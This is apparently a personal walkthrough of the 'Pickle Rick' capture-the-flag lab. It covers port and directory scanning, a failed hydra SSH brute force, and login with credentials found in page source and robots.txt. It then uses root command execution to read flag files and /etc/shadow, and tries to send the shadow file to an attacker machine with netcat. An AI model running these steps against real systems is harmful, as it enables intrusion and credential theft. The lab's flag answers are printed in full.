PICKLE RICK.




INSPECTING BROWSER.
Finding:
<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->




SCANNING: SERVICES.
Quick nmap scan:
nmap -T4 -p- -sS -sV 10.10.253.43
OUTPUT:
Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 13:10 (0:00:06 remaining)
Nmap scan report for 10.10.253.43
Host is up (0.050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.14 seconds




SCANNING: DIRECTORIES.
Basic gobuster directory scan:
gobuster dir -u 10.10.253.43 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
OUTPUT:
/assets               (Status: 301) [Size: 313] [--> http://10.10.253.43/assets/]
/server-status        (Status: 403) [Size: 277]
Progress: 220559 / 220560 (100.00%)


Second gobuster scan:
gobuster dir -u http://10.10.253.43 -w /usr/share/wordlists/dirb/common.txt
OUTPUT:
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/assets               (Status: 301) [Size: 313] [--> http://10.10.253.43/assets/]
/index.html           (Status: 200) [Size: 1062]
/robots.txt           (Status: 200) [Size: 17]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)


File oriented gobuster scan:
gobuster dir -u http://10.10.253.43 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -x php,txt,bak,zip
OUTPUT:
/login.php            (Status: 200) [Size: 882]
/index.html           (Status: 200) [Size: 1062]
/.htaccess            (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htaccess.zip        (Status: 403) [Size: 277]
/.htaccess.bak        (Status: 403) [Size: 277]
/robots.txt           (Status: 200) [Size: 17]
/.                    (Status: 200) [Size: 1062]
/.html                (Status: 403) [Size: 277]
/.html.txt            (Status: 403) [Size: 277]
/.html.bak            (Status: 403) [Size: 277]
/.html.zip            (Status: 403) [Size: 277]
/.html.php            (Status: 403) [Size: 277]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/.php                 (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htpasswd.bak        (Status: 403) [Size: 277]
/.htpasswd.zip        (Status: 403) [Size: 277]
/.htm.bak             (Status: 403) [Size: 277]
/.htm.zip             (Status: 403) [Size: 277]
/.htm.php             (Status: 403) [Size: 277]
/.htm                 (Status: 403) [Size: 277]
/.htm.txt             (Status: 403) [Size: 277]
Progress: 9229 / 85650 (10.78%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 9301 / 85650 (10.86%)




(FAILED) HYDRA: BRUTEFORCING SSH FOUND USER.
Note:
Since we found a username (R1ckRul3s) when inspecitng the ip on a browser, we will try to bruteforce the ssh login with it.
Basic hydra ssh cracking:
hydra -l R1ckRul3s -P ~/thm/rockyou.txt 10.10.253.43 ssh
OUTPUT:
[ERROR] target ssh://10.10.253.43:22/ does not support password authentication (method reply 4).
Note:
We won't be able to bruteforce the password.




CHECKING ROBOTS.TXT MANUALLY.
Findings:
Wubbalubbadubdub




LOGGING INTO PORTAL.PHP.
Note:
With the user R1ckRul3s and password Wubbalubbadubdub, we manage to get in the portal.
A command panel appears. Testing commands ahead.


Identification:
whoami
OUTPUT:
www-data


Root privileges:
Matching Defaults entries for www-data on ip-10-10-253-43:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-253-43:
    (ALL) NOPASSWD: ALL
Note:
www-data is root.


Listing directory:
ls
OUTPUT:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt


Super secret ingredient:
less Sup3rS3cretPickl3Ingred.txt
OUTPUT:
mr. meeseek hair
Note:
That was the first ingredient.


Clue:
less clue.txt
OUTPUT:
Look around the file system for the other ingredient.





NEXT INGREDIENT: SEARCHING FILE SYSTEM.
Current directory:
pwd
OUTPUT:
/var/www/html


Following the clue, and knowing we are root, we check root directory:
sudo su -c "ls /root"
OUTPUT:
3rd.txt
snap


Looks like we just need to cat the third ingredient:
sudo su -c "less /root/3rd.txt"
OUTPUT:
3rd ingredient: fleeb juice
ls /home




NEXT INGREDIENT:
Note:
We will try to somehow gain access to "rick's" account.
Check users on machine (with a home directory):
ls /home
OUTPUT:
rick
ubuntu


Check ricks password hash:
less /etc/shadow | grep rick
ERROR:
Shows no output.


Note:
Lets try a different method. Creating a txt with the hashes and sending it over to the attacking machine.
Txt creation:
sudo cp /etc/shadow /tmp/shadow_copy.txt


Netcat on attacker:
nc -lvp 4444 > shadow_copy.txt

Netcat on attacked:
nc 10.10.14.2 4444 < /tmp/shadow_copy.txt

ERROR:
No file is sent over.


MISTAKE:
Overcomplicating the problem. It's not that less doesn't work on /etc/shadow. I was forgetting to add sudo at the start, thus running the command as www-data and not root (getting no output).
Checking /etc/shadow properly:
sudo less /etc/shadow
Note:
Output doesn't show user rick. As confirmed by running:
sudo grep '^rick:' /etc/passwd

Checking rick folder (listed after running ls /home):
ls -la /home/rick
OUTPUT:
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

Check second ingredients file type:
file "/home/rick/second ingredients"
OUTPUT:
/home/rick/second ingredients: ASCII text


Read second and last ingredient:
while read line; do echo "$line"; done < "/home/rick/second ingredients"
OUTPUT:
1 jerry tear
